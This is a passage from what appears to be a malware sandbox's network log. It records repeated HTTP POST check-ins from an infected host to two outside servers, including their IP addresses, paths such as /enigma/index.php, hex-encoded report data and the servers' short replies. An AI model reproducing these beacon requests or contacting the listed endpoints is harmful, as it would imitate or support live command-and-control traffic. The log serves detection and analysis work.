                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:12.677223921 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1357192.168.2.551211193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:12.585504055 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:12.831057072 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1358192.168.2.551212193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:12.929544926 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:13.181548119 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1359192.168.2.551213193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:13.079039097 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:13.327615023 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1360192.168.2.551214193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:13.507913113 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:13.750281096 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1361192.168.2.551215193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:13.667525053 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:13.915930986 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1362192.168.2.551216193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:14.002882004 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:14.254292011 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1363192.168.2.551217193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:14.162364006 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:14.410401106 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1364192.168.2.551218193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:14.589596033 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:14.843703985 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1365192.168.2.551219193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:14.756815910 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:15.004563093 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1366192.168.2.551220193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:15.095187902 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:15.347683907 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1367192.168.2.551221193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:15.253256083 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:15.503249884 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1368192.168.2.551222193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:15.684547901 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:15.935569048 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1369192.168.2.551223193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:15.854589939 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:16.101836920 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1370192.168.2.551224193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:16.192755938 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:16.443315983 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1371192.168.2.551225193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:16.358067036 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:16.611038923 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1372192.168.2.551226193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:16.774476051 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:17.018140078 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1373192.168.2.551227193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:16.948791027 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:17.195646048 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
